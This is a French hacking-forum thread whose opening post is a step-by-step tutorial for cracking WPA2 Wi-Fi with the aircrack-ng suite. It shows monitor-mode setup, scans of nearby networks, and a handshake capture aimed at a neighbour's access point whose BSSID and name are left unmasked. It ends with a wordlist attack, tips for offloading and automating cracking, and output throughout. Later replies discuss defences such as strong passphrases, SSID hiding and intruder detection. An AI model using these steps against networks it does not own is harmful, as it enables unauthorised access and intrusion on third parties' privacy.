• STATISTIQUES
  • Il y a eu un total de 0 membres et 50744 visiteurs sur le site dans les dernières 24h pour un total de 50 744 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Zmaster
    Articles sur l'informatique, le hacking, le P2P, les divx, les astuces windows XP, les GSM, Emule, la cryptograph...
    Hacking
    [FR] Root-Me
    Notre équipe se base sur un constat : à l'heure actuelle ou l'information tend à devenir...
    Hacking
    [FR] NewbieContest
    Nous vous proposons une série de challenges regroupant plusieurs domaines allant de l'exploitation de fail...
    Hacking
    [EN] phrack
    Lot's of stuff !
    Hacking
    [EN] Sabre Films
    Site de challenge présenté sous la forme d'une quête. Vous êtes un détective et devrez résoudre d...
    Challenges
    [EN] Framework Metasploit
    Le Framework Metasploit est un logiciel gratuit, open source de tests de pénétration développ&ea...
    Vulnérabilités
    [FR] Developpez.net
    Un forum communautaire qui se veut pour les développeurs en générale. Avec presque 500 000 membr...
    Programmation

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
[HowTo] Cracker un réseau WPA2
16-11-2013, 19h54 (Modification du message : 16-11-2013, 20h00 par Serphentas.)
Message : #1
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
[HowTo] Cracker un réseau WPA2
Salut Smile

Comme vous le savez, je ne suis ni programmeur de renommée ni hacker recherché. Cependant, les attaques contre les réseaux Wi-Fi, ça me parle. Je vous montre donc quelques résultats et informations que j'ai récoltés au fil du temps.

Tout se passe sous BackTrack (version 5 R3). Pour une performance accrue, j'utilise mon ordinateur fixe. Puisqu'il n'a pas de carte réseau sans-fil, je me suis acheté un bon truc à 15$: $link$

On initialise d'abord l'interface wlan0:
Code :
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng stop mon0

Puis, on se renseigne sur les réseaux environnants:
Code :
airodump-ng wlan0

On obtient alors une liste de tous les AP ainsi que les terminaux qui y sont connectés: (j'ai masqué certaines informations avec des $$)

Code :
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                              
00:$$:E3:$$:64:$$  -26      183    15982    0   6  54e. WPA2 CCMP   PSK  $$$                                                                                                          
64:$$:D7:$$:47:$$  -52      287       32    0   1  54e  WPA2 CCMP   PSK  $$$                                    
80:$$:AB:$$:00:$$  -54      214        5    0  11  54e  WPA2 CCMP   PSK  $$$                                  
AC:$$:0B:$$:CD:$$  -65      169        0    0   4  54e  WPA2 CCMP   PSK  $$$                                    
24:$$:11:$$:42:$$  -67      247        1    0   1  54e. WPA2 CCMP   PSK  $$$                  
00:$$:C9:$$:7C:$$  -67      246       70    0   1  54e  WPA2 CCMP   PSK  $$$                                                          
00:$$:A6:$$:C9:$$  -70      311      297    0   8  54 . OPN              $$$                                                              
00:$$:A6:$$:CA:$$  -72       39      610    0   4  54 . OPN          
$$$                                                                                                                                                                                                                      

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                                                                                                                                  
80:$$:AB:$$:00:$$  00:$$:20:$$:BC:$$  -54   36e- 1e     0       47  $$$                                        
80:$$:AB:$$:00:$$  18:$$:96:$$:B5:$$  -74    1e- 1      0       37                                                    
24:$$:11:$$:42:$$  C4:$$:FE:$$:2B:$$  -74    1e- 1      0       10  $$$                          
00:$$:A6:$$:C9:$$  98:$$:F7:$$:7E:$$   -1    1 - 0      0       26                                                  
00:$$:A6:$$:CA:$$  38:$$:3C:$$:3D:$$   -1    1 - 0      0        4                                                  
00:$$:A6:$$:CA:$$  84:$$:88:$$:14:$$   -1   11 - 0      0        1                                                  
00:$$:A6:$$:CA:$$  98:$$:82:$$:A9:$$   -1    5 - 0      0       44                                                  
00:$$:A6:$$:CA:$$  00:$$:04:$$:18:$$   -1    5 - 0      0       48

Le but étant d'obtenir le handshake lors d'une connexion d'un terminal à l'AP, on optera pour une surveillance des réseaux "bondés". Dans ce cas, l'AP dont le MAC est 00:$$:E3:$$:64:$$ semblerait optimal. Il ne l'est en fait pas, puisqu'après une longue surveillance on s'aperçoit qu'il n'y a qu'un client de connecté et un flot de données discontinu. On veut pouvoir attraper les utilisateurs qui se connectent, pas ceux qui sont connectés. On choisit alors l'AP avec le MAC 64:$$Big Grin7:$$:47:$$.

On utilise toujours airodump, mais cette fois on restreint son champ d'analyse.

Code :
airodump-ng -c 1 --bssid 64:$$:D7:$$:47:$$ -w psk wlan0

Les arguments sont les suivants:
-c -> canal radio de l'AP
--bssid -> adresse MAC de l'AP
-w -> préfixe de l'output (.cap si format non défini)

On se retrouve alors avec ceci:

Code :
CH  1 ][ Elapsed: 6 mins ][ 2013-11-16 17:58 ][ fixed channel wlan0: 13              
                                                                                      
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  
                                                                                      
64:87:D7:02:47:59  -51   4      681       53    0   1  54e  WPA2 CCMP   PSK  oso-4998
                                                                                      
BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Manque de bol, aucun utilisateur ne s'est connecté. Il faudra donc laisser le programme tourner quelques heures, voire quelques jours. Puisque cela prend forcément du temps, on va se mettre à analyser d'autres réseaux. Je vous déconseille fortement de faire cela à moins que vous ayez une carte réseau par AP "sniffé". En effet, l'antenne devra jongler entre deux canaux (ou plus) et peut alors potentiellment manquer un handshake.

Une fois le handshake trouvé, vous le verrez en haut à droite de la page: (fait sur mon propre réseau cette fois, car l'autre ne coopérait pas)

Code :
CH 13 ][ Elapsed: 48 mins ][ 2013-11-16 18:01 ][ WPA handshake: 00:$$:F6:$$:B5:$$    
                                                                                      
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  
                                                                                      
00:$$:F6:$$:B5:$$  -40   1     2216    16952    3  13  54e. WPA2 CCMP   PSK  SAFIR    
                                                                                      
BSSID              STATION            PWR   Rate    Lost    Frames  Probe            
                                                                                      
00:$$:F6:$$:B5:$$  04:$$:95:$$:CC:$$  -127    0e- 0e     0    15487                    
00:$$:F6:$$:B5:$$  AC:$$:0B:$$:CA:$$  -127    0e- 0e   263     1145                    
00:$$:F6:$$:B5:$$  AC:$$:0B:$$:CA:$$  -127    1e- 0    708     1375

Notez que le handshake n'apparaît uniquement lorsqu'un appareil inconnu se connecte (et entre alors le mot de passe). C'est précisément à ce moment-là que la négociation (de la clef ?) a lieu. Si un appareil connu (avec mot de passe déjà enregistré) se connecte, vous n'aurrez pas le handshake.

Une fois le handshake en main, on peut procéder au crack:

Code :
aircrack-ng -a 2 -b 00:$$:F6:$$:B5:$$ -l key.txt -w /media/Data/18_in_1.lst /root/psk-01.cap

À nouveau, les arguments sont les suivants:
-a -> mode de crack (1 pour WEP, 2 pour WPA(2))
-b -> adresse MAC de l'AP
-l -> nom et format du fichier output (la clef)
-w -> chemin de la wordlist

Code :
Aircrack-ng 1.1 r2178


                   [00:00:09] 57144 keys tested (5881.08 k/s)


                       Current passphrase: 121212poohbear            


      Master Key     : 94 52 0A 5A 45 8A 20 4A 13 7B C2 62 8A 1C BF 89
                       53 A2 BB 4B 96 9E BD FF 64 92 4D 3D 8B 11 D9 F9

      Transient Key  : 48 76 A2 87 B0 38 E1 02 81 A5 82 04 2E 57 09 21
                       CB ED 2C 86 67 9A D6 E2 08 9B 60 7C 22 5E 82 28
                       2D 8A 16 35 3B B3 49 00 73 48 A2 E7 2F 28 61 B1
                       90 59 02 70 7E 96 A3 C2 AF 66 C0 E6 C1 35 F0 0A

      EAPOL HMAC     : E7 5B 6C 1D D0 D5 15 9B C3 D2 5D B2 4D DF 90 DC

On peut voir qu'aircrack teste une à une toutes les clefs de la wordlist. J'ai préféré utiliser mon ordinateur fixe car son taux de test (~5900 clefs/sec) est bien plus important que celui d'un portable, par exemple. Étant donné que l'on ne peut pas vraiment combler ce manque sur un portable, j'ai pensé à une certaine méthodologie:

1) Enregistrer l'output d'airodump sur un ordinateur distant en spécifiant un chemin réseau (envoyer le tout via Internet sera trèèès long)
2) Exécuter aircrack sur la même machine distante en spécifiant l'output vers le portable

L'idéal serait un accès SSH ou autre. Overclocker le CPU aide grandement. De plus, les CPUs hautement multi-threads seront avantagés (j'ai 6C/12T ici).

Puisque la wordlist n'est pas optimale pour la clef de mon AP, aircrack ne la trouvera probablement jamais. C'est pourquoi le choix de la wordlist est très important quand à l'obtention du mot de passe d'un AP. Vous pouvez générer toutes les possibilités de min-maj-num jusqu'à 16 caractères mais bonjour l'espace disque gaspillé. C'est pourquoi il faut faire une wordlist à base de mots (vbtrTdbbr%2+ est assez dur à mémoriser, comparé à djeanwifi251076). Je pense que trouver la bonne wordlist est plus dur que trouver le handshake (relativement simple, il suffit d'un peu de patience).

En ce qui concerne la création de worlists, crunch (Linux) et L517 (Windows) font très bien leur boulot. Le premier est plus complet à mes yeux. Une bonne explication de son fonctionnement: http://adaywithtape.blogspot.ch/2011/05/...h-v30.html

Bref, voilà comment ça se présente pour cracker du WPA.
+1 (1) -1 (0) Répondre
16-11-2013, 21h35
Message : #2
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
w00t merci pour ce tuto sur comment font les pirates, sinon du coté white hat de la chose on a quoi comme solutions pour empêcher ça ? ça peut faire l'objet d'un tuto aussi ?
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
+1 (0) -1 (0) Répondre
16-11-2013, 21h39 (Modification du message : 16-11-2013, 21h40 par Kiwazaru.)
Message : #3
Kiwazaru Hors ligne
Padawan d'un super escargot
*



Messages : 284
Sujets : 26
Points: 139
Inscription : Mar 2012
RE: [HowTo] Cracker un réseau WPA2
Il serait bien de faire une lexique de tous les termes que tu emplois dans ton paper. Si on n'est pas familier avec tous ces termes, je pense qu'on y est vite perdu Wink
Sinon oui, il serait intéressant d'avoir un avis sur la sécurisation/mise en place de protection contre cette attaque Smile
Toucher au Kernel, c'est un peut comme se shooter au LSD, on pense pouvoir tout faire mais ça finit souvent mal.
+1 (0) -1 (0) Répondre
16-11-2013, 21h50 (Modification du message : 16-11-2013, 21h51 par Loup.)
Message : #4
Loup Hors ligne
Membre actif
*



Messages : 85
Sujets : 8
Points: 8
Inscription : Sep 2013
RE: [HowTo] Cracker un réseau WPA2
Salut gruik, je décide de te répondre pour repartir sur de bonnes bases avec toi (^_^)

Premièrement, la chose que personne ne fait, mais que tout le monde doit faire...
Changer le mot de passe de connexion au routeur!
(pour ceux qui ne comprennent pas là où je veux en venir: http://i.imgur.com/6jaSToz.png)
Cela évitera à quelqu'un de connecté sur ta box, de changer certains paramètres qui te feront bien chier par la suite.

Secondement, comme on le vois, une attaque par "wordlist" est effectuée c'est à dire que si le mot de passe que tu as choisi n'est pas dans ce wordlist, il ne pourra bien évidemment pas être cracké.

Les modes WPA/WPA2 proposent ces 3 longueurs:
- WPA - 64-bit - 8 Characters
- WPA2 - 160-bit - 20 Characters
- WPA2 - 504-bit - 63 Characters

Ce qui donne une clé de ce genre en HEX:
6C215A4533456E3544634A6567364C6C26473033476150723075575E434A4268565439727253612B57566B6739483726726D52416758372A3D54734B244D4D

On voit tout de suite que c'est plus sécurisé qu'un WPA du type:
66F9252255FAE25D55C799E766

tout dépend aussi du mot de passe en ascii que vous entrez c'est sur qu'un buffer overflow de 0x41
un wordlist peut le contenir :)

Dernier point que j'aborde ici pour ne pas partir trop loin (ce n'est pas un tutoriel hein :p)

-Cacher son ssid!
Je vous laisse deviner pourquoi :'=)


Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien :) (sauf si on a eu recours au social engineering)

(16-11-2013, 21h50)Loup a écrit : Salut gruik, je décide de te répondre pour repartir sur de bonnes bases avec toi (^_^)

Premièrement, la chose que personne ne fait, mais que tout le monde doit faire...
Changer le mot de passe de connexion au routeur!
(pour ceux qui ne comprennent pas là où je veux en venir: http://i.imgur.com/6jaSToz.png)
Cela évitera à quelqu'un de connecté sur ta box, de changer certains paramètres qui te feront bien chier par la suite.

Secondement, comme on le vois, une attaque par "wordlist" est effectuée c'est à dire que si le mot de passe que tu as choisi n'est pas dans ce wordlist, il ne pourra bien évidemment pas être cracké.

Les modes WPA/WPA2 proposent ces 3 modes:
- WPA - 64-bit - 8 Characters
- WPA2 - 160-bit - 20 Characters
- WPA2 - 504-bit - 63 Characters

Ce qui donne une clé de ce genre en HEX:
6C215A4533456E3544634A6567364C6C26473033476150723075575E434A4268565439727253612B57566B6739483726726D52416758372A3D54734B244D4D

On voit tout de suite que c'est plus sécurisé qu'un WPA du type:
66F9252255FAE25D55C799E766

tout dépend aussi du mot de passe en ascii que vous entrez c'est sur qu'un buffer overflow de 0x41
un wordlist peut le contenir :)

Dernier point que j'aborde ici pour ne pas partir trop loin (ce n'est pas un tutoriel hein :p)

-Cacher son ssid!
Je vous laisse deviner pourquoi :'=)


Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien :) (sauf si on a eu recours au social engineering)
+1 (1) -1 (0) Répondre
16-11-2013, 23h32
Message : #5
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
(16-11-2013, 21h35)gruik a écrit : sinon du coté white hat de la chose on a quoi comme solutions pour empêcher ça ? ça peut faire l'objet d'un tuto aussi ?

Il essaye de cracker le password avec une wordlist, pour "sécuriser" une longue chaine aléatoire suffit, pas besoin d'un tuto Smile
+1 (1) -1 (0) Répondre
17-11-2013, 00h18
Message : #6
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(16-11-2013, 23h32)c4ffein a écrit : Il essaye de cracker le password avec une wordlist, pour "sécuriser" une longue chaine aléatoire suffit, pas besoin d'un tuto Smile

oui oui j'entends bien mais c'était surtout pour mettre un peu l'accent sur le coté "white hat" inhérent à n-pn et l'occasion d'une réflexion rapide sur tout ça

quant à faire un tuto je suis d'accord qu'en l'occurrence il n'y a probablement pas de quoi faire, les attaques sur WPA/WPA2 n'ont pas évolué d'un iota depuis plus de 5 ans et la sécurité du wifi, hors mot de passe, repose sur le design et l’implémentation des "box" diverses, lesquelles sont par défaut relativement bien sécurisées désormais sans parler des efforts un peu partout de communication sur le sujet

donc concrètement on parle d'un "hacking" qui consiste à tomber sur un pigeon qui aura choisi un mot de passe faible ou dont la box est toujours la même depuis 10 ans et carbure toujours au WEP, sans être bégueule il s'agit tout de même d'être conscient de ce que l'on fait, un peu comme si l'on écrivait des tutos sur comment repérer les pigeons à racketter
Citation :"choisissez bien votre cible, préférez des personnes vêtues de manteaux amples avec de grandes poches, les femmes seules avec une poussette sont des cibles idéales car elles ne vous courront pas après si vous vous faites gauler..."

il y a 15 ans de ça on expliquait à qui voulait l'entendre que "pour pouvoir combattre les pirates il faut penser comme eux", nul doute que le propos est toujours le même, pas vrai ? Wink

heureusement on est au sein d'une communauté de hackers white-hat et notre soif d'apprendre des choses intelligentes nous pousse à nous poser des questions qui vont plus loin que ces pirates à 2 balles d'Anonymous, la différence c'est que nous quand on parle de comment pirater on sait comment ça fonctionne en dessous n'est-ce pas, la tête des protocoles 802.11x, le chiffrement utilisé, le modèle de crypto employé etc.
dès lors on pourrait se poser tout un tas de questions du genre :
* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ?
* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ?
* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ?
* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ?
* etc.

finalement au delà de l'éthique personnelle, la seule limite est l'imagination non ?
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
+1 (2) -1 (0) Répondre
17-11-2013, 00h34
Message : #7
b0fh Hors ligne
Membre actif
*



Messages : 210
Sujets : 17
Points: 309
Inscription : Jul 2012
RE: [HowTo] Cracker un réseau WPA2
Citation :-Cacher son ssid!
Je vous laisse deviner pourquoi :'=)

Je dois être un peu bête, mais j'ai de la peine à comprendre en quoi c'est une bonne idée. Sachant que le SSID est diffusé en clair dans chaque trame, ça n'apporte donc absolument aucune sécurité, en revance ça force le client a lancer des requêtes d'association dans le vide, et offre donc une opportunité supplémentaire d'attaquer le client avec un faux AP. Qu'est-ce qui est le plus dangereux, se faire utiliser sa connexion internet à son insu, ou se faire MITM ses machines ?
+1 (2) -1 (0) Répondre
17-11-2013, 00h55 (Modification du message : 17-11-2013, 01h04 par Serphentas.)
Message : #8
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
Pour contrer ce genre d'attaque, on doit se munir d'un bon mot de passe (et éviter le Wi-Fi Protected Setup).

Pour calculer le nombre de possibilités à tester pour retrouver votre mot de passe, essayez ceci:
2^n où n=(log(x)/log(2)*k)

n correspond à l'entropie de votre mot de passe. Plus il est élevé, plus il faudra tester de combinaisons. On divise en général le 2^n par 2, puisqu'on teste rarement toutes les possibilités. Convertissez ensuite ce résultat en minutes, heures, jours, années... suivant la vitesse d'essai (x mots de passe/sec).

Puisque k est un coefficient, privilégiez un mot de passe long. Évitez aussi les mots et/ou phrases, puisqu'une wordlist de mots est plus rapidement faite qu'une à base de caractères random.

Comme dit plus haut, ne pas émettre (broadcast) son (E)SSID est utile pour que les gens "normaux" ne voient pas votre réseau. Par contre, un pirate muni de la suite airecrack ne sera pas désavantagé puisqu'il n'a pas besoin de l'(E)SSID. Cela peut néanmoins l'éloigner s'il ne fait pas une recherche approfondie des réseaux environnants.

Quant aux mots utilisés

**suite**

Quant au vocabulaire, je mets ici en attendant une future modification:

MAC: Media Access Control, c'est l'adresse (unique) matérielle d'une carte réseau
AP: Access Point, ou point d'accès (Wi-Fi)
sniff: littéralement renifler, le fait d'écouter les données et informations qui passent
handshake: négociation, c'est un transit de données fait en vu de l'établissement d'une connexion/lien de communication (ici: radio)

Pour répondre à gruik:

* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet.
* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post
* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur).
* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack.

Enfin:

Qu'est-ce qui est le plus dangereux, se faire utiliser sa connexion internet à son insu, ou se faire MITM ses machines ? => Tout est dangereux. Un inconnu qui télécharge du pr0n -18 avec ta connexion et tu diras bonjour à la police. Avec un MITM tu te fais choper des informations sensibles.
+1 (2) -1 (0) Répondre
17-11-2013, 01h08 (Modification du message : 17-11-2013, 01h15 par Loup.)
Message : #9
Loup Hors ligne
Membre actif
*



Messages : 85
Sujets : 8
Points: 8
Inscription : Sep 2013
RE: [HowTo] Cracker un réseau WPA2
@b0fh
Comme l'a très bien dit Serphentas, c'est utile contre les utilisateurs lambda.
Mais cacher son SSID n'est pas si une bonne idée que ça en y réfléchissant (je me contredis là :p) quelqu'un pourrait très bien utiliser un rogue AP à l’insu d'autres utilisateurs...

M'enfin, cacher son SSID ne sert pas à grand chose, c'est juste une "mini-protection" contre les petits-joueurs Smile

Arf, je viens de relire ton post et je re-dis un peu tout ce que tu as dit :'=)
+1 (0) -1 (1) Répondre
17-11-2013, 01h23
Message : #10
b0fh Hors ligne
Membre actif
*



Messages : 210
Sujets : 17
Points: 309
Inscription : Jul 2012
RE: [HowTo] Cracker un réseau WPA2
Pardon, mais a l'heure ou n'importe quel mongolien peut installer un sniffer tout automatique sur son smartphone, ton SSID caché ne t'apporte strictement zéro, zilch, nada, que d'alle, néant total, absolument aucune sécurité supplémentaire par rapport a un mot de passe.

A propos de l'entropie:
Citation :2^n où n=(log(x)/log(2)*k)
est juste une manière inutilement compliquée d'écrire x^k, ou x est la taille de l'alphabet et k la longueur, les noms sont bizarres. Quoi qu'il en soit, ça n'a pas de sens de parler d'entropie d'un mot de passe particulier (l'entropie d'une donnée connue est nulle), c'est une borne maximum sur l'entropie vue par un attaquant qui suppose une distribution aléatoire équiprobable des mots de passe.

Et pour ce qui est du danger des attaques... en te MITMisant on peut aussi remplir le cache de ton navigateur avec du pedopr0n, et tu ne pourras pas invoquer un défaut de sécurisation de ta connexion internet. Cet argument ne tient pas.
+1 (2) -1 (0) Répondre
17-11-2013, 02h26
Message : #11
Ant4rt1c Hors ligne
Membre
*



Messages : 27
Sujets : 1
Points: -1
Inscription : Oct 2013
RE: [HowTo] Cracker un réseau WPA2
Citation :Dernièrement je voudrais finaliser tout ceci avec le simple fait qu'une attaque de ce genre est impossible à moins d'être déjà connecté sur la victime ( la capture de paquet est impossible) , ce qui ne sert complétement à rien Smile

je ne m'y connais pas encore très bien en réseau et je ne suis pas sur de comprendre ton commentaire. Tu veux dire qu'on ne peut pas savoir si un nouvel utilisateur se connecte a la box si on y est pas connecté ?
+1 (0) -1 (0) Répondre
17-11-2013, 02h40
Message : #12
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 00h55)Serphentas a écrit : Pour répondre à gruik:

ouai, c'était un ensemble de questions non-exhaustif plus destiné à faire réfléchir qu'à assouvir réellement ma curiosité personnelle en fait Wink

Citation :* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet.

sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ?
ensuite un AP qui recevrait un rejeu massif -puisque c'est de ça qu'il s'agit- de paquets dans un laps de temps relativement court pourrait probablement être détecté comme étant un attaquant et en guise de contre-mesure renvoyer des paquets avec des fake IV par exemple

Citation :* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post

ok mettons que le sujet lui-même doit pouvoir occasionner un article/tutoriel à part, celui de la stratégie des mots de passe, et qui serait un peu plus étoffé qu'une seule ligne perdue dans un tuto

Citation :* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur).

bannir sur l'adresse MAC c'est un peu comme bannir un browser sur son user-agent finalement, c'est d'ailleurs souvent la première chose qu'on fait de modifier son adresse MAC, sachant que selon la box le propos est de prendre précisément la MAC du client légitime pour tromper l'association qui est faite, bannir l'adresse MAC revient à se couper les noix tout seul dans ce cas ce serait pas vraiment judicieux

Citation :* serait-il possible d'automatiser ça ? faire par exemple un programme qui tourne en tache de fond et surveille les accès indus, ça pourrait faire l'objet d'un projet sécu ? ça existe peut-être déjà ? => Tu peux tout à fait scripter tout ça, de telle sorte à ce que ça trouve un bon AP, le sniff, trouve son handshake et parte faire un crack.

yep, là encore merci de me confirmer que c'est possible, c'est précisément ce sur quoi je voulais attirer l'attention
je me dis qu'un article autour d'un ptit code perso qui par exemple lirait en temps réel le log de connexion du routeur comme tu disais, ou tenterait de découvrir des machines sur le réseau à l'aide de {nmap,hping,tshark,scapy,zob,...} et le cas échéant remonterait une alerte sous forme d'un popup (...) serait finalement tout aussi intéressant qu'un tuto sur comment utiliser aircrack-ng pour pirater son voisinage
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
+1 (1) -1 (0) Répondre
17-11-2013, 20h44 (Modification du message : 17-11-2013, 23h11 par Di0Sasm.)
Message : #13
c4ffein Hors ligne
Membre
*



Messages : 49
Sujets : 2
Points: 5
Inscription : Jul 2013
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 02h40)gruik a écrit : sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ?
ensuite un AP qui recevrait un rejeu massif -puisque c'est de ça qu'il s'agit- de paquets dans un laps de temps relativement court pourrait probablement être détecté comme étant un attaquant et en guise de contre-mesure renvoyer des paquets avec des fake IV par exemple
La il crack sans injection de packet a ce que j'ai compris, non?
+1 (0) -1 (0) Répondre
18-11-2013, 00h36
Message : #14
gruik Hors ligne
gouteur de savon
*



Messages : 757
Sujets : 44
Points: 482
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 20h44)c4ffein a écrit : La il crack sans injection de packet a ce que j'ai compris, non?

oui, au temps pour moi je me suis mélangé les pinceaux Wink
reste que ce serait potentiellement encore plus facile à détecter du coup...
Avant donc que d'écrire, apprenez à penser.
Selon que notre idée est plus ou moins obscure, l'expression la suit, ou moins nette, ou plus pure.
Ce que l'on conçoit bien s'énonce clairement, et les mots pour le dire arrivent aisément.
(Nicolas Boileau, L'Art poétique)
+1 (0) -1 (0) Répondre
18-11-2013, 00h51
Message : #15
Serphentas Hors ligne
Thall
*



Messages : 41
Sujets : 10
Points: 29
Inscription : Oct 2012
RE: [HowTo] Cracker un réseau WPA2
(17-11-2013, 02h40)gruik a écrit :
(17-11-2013, 00h55)Serphentas a écrit : Pour répondre à gruik:

ouai, c'était un ensemble de questions non-exhaustif plus destiné à faire réfléchir qu'à assouvir réellement ma curiosité personnelle en fait Wink

Autant pour moi Smile


Citation :* vu que la seule attaque possible est un bruteforce, n'y aurait-il pas moyen de couper court carrément ? => Couper le Wi-Fi ? Si oui, j'aimerais bien ! Je m'en passerais volontiers mais mon téléphone n'as malheureusement pas (encore) de prise Ethernet.

sans parler couper le wifi on pourrait envisager de détecter le sniffing peut-etre comme on peut le faire sur Ethernet ?
ensuite un AP qui recevrait un rejeu massif -puisque c'est de ça qu'il s'agit- de paquets dans un laps de temps relativement court pourrait probablement être détecté comme étant un attaquant et en guise de contre-mesure renvoyer des paquets avec des fake IV par exemple

Il faudrait alors programmer l'AP de telle sorte à ce qu'il se protège en envoyant des fake IV aux attaquants.

Citation :* quelle stratégie de mot de passe adopter pour son wifi ? le renouveler régulièrement ? tous les combien ? telle ou telle box ne permet que des password alphabétiques en majuscule ? => Voir la première partie de mon post

ok mettons que le sujet lui-même doit pouvoir occasionner un article/tutoriel à part, celui de la stratégie des mots de passe, et qui serait un peu plus étoffé qu'une seule ligne perdue dans un tuto

Un tuto sur les mots de passe ? Pourquoi pas.

Citation :* si on imagine que le pirate parvient quand même à rentrer sur le réseau, est-ce qu'on a moyen de le détecter rapidement/en temps réel ? par quel(s) moyen(s) ? => Si tu regardes les logs de ton router (ou que tu analyses les clients connectés à ton AP avec airodump), tu peux rapidement voire quel est le client qui n'a pas une adresse MAC connue. C'est-à-dire, tu peux vérifier les adresss MAC de tes appareils et bannir celle que tu ne connais pas (via le routeur).

bannir sur l'adresse MAC c'est un peu comme bannir un browser sur son user-agent finalement, c'est d'ailleurs souvent la première chose qu'on fait de modifier son adresse MAC, sachant que selon la box le propos est de prendre précisément la MAC du client légitime pour tromper l'association qui est faite, bannir l'adresse MAC revient à se couper les noix tout seul dans ce cas ce serait pas vraiment judicieux

Dans ce cas, tu peux faire un script qui blacklist automatiquement les adresses MAC qui ne sont pas whitelistées (tes appareils). Il suffit alors d'entrer manuellement ses nouveaux appareils afin de les utiliser.

